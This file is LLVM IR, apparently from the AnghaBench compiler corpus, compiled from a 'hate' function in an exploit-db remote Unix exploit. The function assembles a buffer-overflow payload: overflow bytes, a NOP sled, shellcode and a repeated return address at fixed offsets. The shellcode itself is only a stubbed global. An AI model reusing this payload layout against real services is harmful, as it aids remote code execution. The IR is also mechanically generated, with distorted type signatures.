; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/unix/remote/extr_22469.c_hate.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/unix/remote/extr_22469.c_hate.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@buffer = common dso_local global i8* null, align 8
@BUFFER = common dso_local global i32 0, align 4
@overflow = common dso_local global i32 0, align 4
@NOP = common dso_local global i32 0, align 4
@shellcode = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @hate(i64 %0) #0 {
  %2 = alloca i64, align 8
  %3 = alloca i32, align 4
  %4 = alloca i8*, align 8
  store i64 %0, i64* %2, align 8
  %5 = load i8*, i8** @buffer, align 8
  store i8* %5, i8** %4, align 8
  %6 = load i8*, i8** @buffer, align 8
  %7 = load i32, i32* @BUFFER, align 4
  %8 = call i32 @bzero(i8* %6, i32 %7)
  %9 = load i8*, i8** %4, align 8
  %10 = load i32, i32* @overflow, align 4
  %11 = call i32 @memcpy(i8* %9, i32 %10, i32 96)
  %12 = load i8*, i8** %4, align 8
  %13 = getelementptr inbounds i8, i8* %12, i64 96
  store i8* %13, i8** %4, align 8
  %14 = load i8*, i8** %4, align 8
  %15 = load i32, i32* @NOP, align 4
  %16 = call i32 @memset(i8* %14, i32 %15, i32 808)
  %17 = load i8*, i8** %4, align 8
  %18 = getelementptr inbounds i8, i8* %17, i64 808
  store i8* %18, i8** %4, align 8
  %19 = load i8*, i8** %4, align 8
  %20 = load i32, i32* @shellcode, align 4
  %21 = load i32, i32* @shellcode, align 4
  %22 = call i32 @strlen(i32 %21)
  %23 = call i32 @memcpy(i8* %19, i32 %20, i32 %22)
  %24 = load i32, i32* @shellcode, align 4
  %25 = call i32 @strlen(i32 %24)
  %26 = load i8*, i8** %4, align 8
  %27 = sext i32 %25 to i64
  %28 = getelementptr inbounds i8, i8* %26, i64 %27
  store i8* %28, i8** %4, align 8
  %29 = load i8*, i8** %4, align 8
  %30 = load i32, i32* @NOP, align 4
  %31 = call i32 @memset(i8* %29, i32 %30, i32 131)
  %32 = load i8*, i8** %4, align 8
  %33 = getelementptr inbounds i8, i8* %32, i64 131
  store i8* %33, i8** %4, align 8
  store i32 1127, i32* %3, align 4
  br label %34

34:                                               ; preds = %44, %1
  %35 = load i32, i32* %3, align 4
  %36 = icmp slt i32 %35, 1159
  br i1 %36, label %37, label %47

37:                                               ; preds = %34
  %38 = load i64, i64* %2, align 8
  %39 = load i8*, i8** @buffer, align 8
  %40 = load i32, i32* %3, align 4
  %41 = sext i32 %40 to i64
  %42 = getelementptr inbounds i8, i8* %39, i64 %41
  %43 = bitcast i8* %42 to i64*
  store i64 %38, i64* %43, align 8
  br label %44

44:                                               ; preds = %37
  %45 = load i32, i32* %3, align 4
  %46 = add nsw i32 %45, 4
  store i32 %46, i32* %3, align 4
  br label %34

47:                                               ; preds = %34
  ret void
}

declare dso_local i32 @bzero(i8*, i32) #1

declare dso_local i32 @memcpy(i8*, i32, i32) #1

declare dso_local i32 @memset(i8*, i32, i32) #1

declare dso_local i32 @strlen(i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
